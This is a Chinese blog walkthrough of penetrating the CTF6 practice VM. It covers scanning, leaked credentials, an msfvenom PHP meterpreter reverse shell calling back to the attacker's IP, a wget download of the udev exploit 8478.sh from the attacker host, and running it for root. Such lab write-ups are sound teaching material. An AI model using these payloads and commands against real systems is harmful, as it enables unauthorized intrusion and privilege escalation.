CTF6 靶机渗透

兵无常势,水无常形,能因敌而致胜者,谓之神

1. 环境准备

VMware workstation Pro12
Kali Linux (IP: 10.10.16.133)
CTF6 虚拟机
NAT 网络设置

2. 靶机渗透

2.1 主机发现

可以有以下三种方式:

netdiscover -r 10.10.16.133 (使用)
arp-scan -l
fping -asg

CTF6 靶机渗透_第1张图片

2.2 端口扫描

nmap -A -v -sS -sV -p- -T4 10.10.16.137

开启 80、443、22、3306 重要的端口

CTF6 靶机渗透_第2张图片

2.3 目录扫描

Nikto 识别网站软件版本;搜索存在安全隐患的文件;检查服务器配置漏洞;检查 WEB Application 层面的安全隐患。

nikto -h http://10.10.16.137

CTF6 靶机渗透_第3张图片

  1. 在 sql 目录下发现了一个用户名和密码:admin/adminpass
    CTF6 靶机渗透_第4张图片
  2. 在 docs 目录下发现了源码文件,可以下载下来进行代码审计。
    CTF6 靶机渗透_第5张图片
  3. 进入 phpmyadmin 目录
    CTF6 靶机渗透_第6张图片
  4. 在上面获取的网站源码中,进入 conf /config.ini,发现登录数据库的帐密
    CTF6 靶机渗透_第7张图片
  5. 登录进去之后就可以对数据库为所欲为了。
    CTF6 靶机渗透_第8张图片
  6. 拿到网站的源码,也成功控制了数据库,接下来看能不能拿到服务器的 root 权限。在前面的端口扫描中发现靶机上开放 22 端口,看看在这里获取的用户名和密码能不能进行远程登录。
ssh admin@10.10.16.137

发现不可以
CTF6 靶机渗透_第9张图片

2.4 漏洞挖掘

  1. 用 ZAP 对 http://10.10.16.137 进行扫描,发现了两个高危漏洞。
    CTF6 靶机渗透_第10张图片
  2. SQL 注入漏洞可以用 sqlmap 进行注入,不过既然已经可以控制数据库了,那这里的 SQL 注入漏洞也没必要去试。看一看 XSS 漏洞。
    访问 http://10.10.16.137/?action=login 得到一个登录界面,用上面获取的帐密登录。(推荐使用 谷歌/IE 浏览器 )
    CTF6 靶机渗透_第11张图片
    CTF6 靶机渗透_第12张图片
  3. 如果使用其他浏览器(如:QQ/Firefox)的话,login in 后面的几个按钮不能显示出来。
    CTF6 靶机渗透_第13张图片

2.5 漏洞利用

2.5.1 msf 生成 php 反弹 shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.133 LPORT=4444 -o shell.php
  1. reverse_tcp:攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。
  2. bind_tcp:攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。
  3. 采用reverse的方法一般较为安全,因为是在测试机连接攻击机,所以一般不会被防火墙发现;而bind在测试机打开端口时很容易被安全软件和防火墙发现。

CTF6 靶机渗透_第14张图片

2.5.2 上传 shell

CTF6 靶机渗透_第15张图片

2.5.3 开启 msf

msfconsole

CTF6 靶机渗透_第16张图片

2.5.4 基本配置

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 10.10.16.133

CTF6 靶机渗透_第17张图片

2.5.5 exploit

CTF6 靶机渗透_第18张图片
当靶机访问 home 目录之后,即建立 TCP 连接,靶机访问攻击机的 4444 端口之后产生会话 1 就可以反弹 shell。
(ps:如果没有自动反弹 shell 的话,可以 CTRL+C 退出,加入 sessions 1 管理会话1,就可以反弹 shell)
CTF6 靶机渗透_第19张图片

2.5.6 查看系统信息

sysinfo

在这里可以看到靶机的操作系统内核为 2.6.18 ,而 Linux 2.6 版本存在一个 udev 的本地提权漏洞在下面会利用到。
在这里插入图片描述

2.5.7 进入交互式 shell

shell (进入交互式 shell)
ifconfig(查看主机)
whoami(查看用户)
python -c 'import pty;pty.spawn("/bin/bash")'

CTF6 靶机渗透_第20张图片
在这里插入图片描述

2.5.8 查看攻击脚本

ps : 重新开一个窗口。

searchsploit linux udev

CTF6 靶机渗透_第21张图片

2.5.9 将脚本粘贴到 tmp 文件夹

CTF6 靶机渗透_第22张图片

2.5.10 将 tmp 作为共享目录

在 tmp 目录下开启 http 服务,开启 80 端口

python -m SimpleHTTPServer 80

在这里插入图片描述

2.5.11 下载攻击代码

进入交互式 shell ,下载从攻击机那里下载脚本。

wget http://10.10.16.133/8478.sh

CTF6 靶机渗透_第23张图片

2.5.12 添加执行权限,执行脚本

一般刚上传的文件是普通的文件,没有执行权限,得添加执行权限。

将脚本从文本格式转换为 nuix 格式:dos2unix 8478.sh
添加执行权限:chmod +x 8478.sh
查看执行权限:ls -la 8478.sh
查看进程:cat /proc/net/netlink
利用 568 的一个进程:./8478.sh 568

CTF6 靶机渗透_第24张图片

                                                                                                                            猪头
                                                                                                                         2020.2.19

你可能感兴趣的:(CTF)